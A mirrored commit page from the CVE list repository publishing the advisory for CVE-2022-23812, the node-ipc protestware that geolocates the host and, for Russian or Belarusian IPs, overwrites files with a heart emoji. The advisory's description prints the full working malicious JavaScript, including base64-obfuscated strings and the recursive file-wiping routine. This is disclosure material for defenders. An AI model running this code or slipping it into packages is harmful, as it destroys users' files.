admin/cvelist
1
0
Fork 0
mirror of https://github.com/CVEProject/cvelist.git synced 2025-05-08 03:27:03 +00:00
Code Issues Packages Projects Releases Wiki Activity

Auto-merge PR#4947

Browse Source 
Auto-merge PR#4947
This commit is contained in:
CVE Team 2022-03-16 11:50:29 -04:00 committed by GitHub
commit bf6a2117fe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 92 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

96
2022/23xxx/CVE-2022-23812.json
View File

@ -3,16 +3,104 @@
"data_format": "MITRE",
"data_version": "4.0",
"CVE_data_meta": {
"ASSIGNER": "report@snyk.io",
"DATE_PUBLIC": "2022-03-16T15:41:22.870186Z",
"ID": "CVE-2022-23812",
"ASSIGNER": "cve@mitre.org",
"STATE": "RESERVED"
"STATE": "PUBLIC",
"TITLE": "Malicious Package"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "node-ipc",
"version": {
"version_data": [
{
"version_affected": ">=",
"version_value": "10.1.1"
},
{
"version_affected": "<",
"version_value": "10.1.3"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Malicious Package"
}
]
}
]
},
"references": {
"reference_data": [
{
"refsource": "CONFIRM",
"url": "https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370"
},
{
"refsource": "CONFIRM",
"url": "https://github.com/RIAEvangelist/node-ipc/issues/236"
},
{
"refsource": "CONFIRM",
"url": "https://github.com/RIAEvangelist/node-ipc/issues/233"
},
{
"refsource": "CONFIRM",
"url": "https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js"
},
{
"refsource": "CONFIRM",
"url": "https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580"
}
]
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
"value": "This affects the package node-ipc from 10.1.1 and before 10.1.3.\n This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.\r\n\r\n**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.\r\n\r\n Malicious Code:\r\n\r\n**Note:** Don't run it!\r\n\r\njs\r\nimport u from \"path\";\r\nimport a from \"fs\";\r\nimport o from \"https\";\r\nsetTimeout(function () {\r\n const t = Math.round(Math.random() * 4);\r\n if (t > 1) {\r\n return;\r\n }\r\n const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\", \"base64\"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\r\n o.get(n.toString(\"utf8\"), function (t) {\r\n t.on(\"data\", function (t) {\r\n const n = Buffer.from(\"Li8=\", \"base64\");\r\n const o = Buffer.from(\"Li4v\", \"base64\");\r\n const r = Buffer.from(\"Li4vLi4v\", \"base64\");\r\n const f = Buffer.from(\"Lw==\", \"base64\");\r\n const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\");\r\n const e = Buffer.from(\"cnVzc2lh\", \"base64\");\r\n const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\");\r\n try {\r\n const s = JSON.parse(t.toString(\"utf8\"));\r\n const u = s[c.toString(\"utf8\")].toLowerCase();\r\n const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\")); // checks if country is Russia or Belarus\r\n if (a) {\r\n h(n.toString(\"utf8\"));\r\n h(o.toString(\"utf8\"));\r\n h(r.toString(\"utf8\"));\r\n h(f.toString(\"utf8\"));\r\n }\r\n } catch (t) {}\r\n });\r\n });\r\n}, Math.ceil(Math.random() * 1e3));\r\nasync function h(n = \"\", o = \"\") {\r\n if (!a.existsSync(n)) {\r\n return;\r\n }\r\n let r = [];\r\n try {\r\n r = a.readdirSync(n);\r\n } catch (t) {}\r\n const f = [];\r\n const c = Buffer.from(\"4p2k77iP\", \"base64\");\r\n for (var e = 0; e < r.length; e++) {\r\n const i = u.join(n, r[e]);\r\n let t = null;\r\n try {\r\n t = a.lstatSync(i);\r\n } catch (t) {\r\n continue;\r\n }\r\n if (t.isDirectory()) {\r\n const s = h(i, o);\r\n s.length > 0 ? f.push(...s) : null;\r\n } else if (i.indexOf(o) >= 0) {\r\n try {\r\n a.writeFile(i, c.toString(\"utf8\"), function () {}); // overwrites file with \u2764\ufe0f\r\n } catch (t) {}\r\n }\r\n }\r\n return f;\r\n}\r\nconst ssl = true;\r\nexport { ssl as default, ssl };\r\n\n"
}
]
}
},
"impact": {
"cvss": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH"
}
},
"credit": [
{
"lang": "eng",
"value": "Unknown"
}
]
}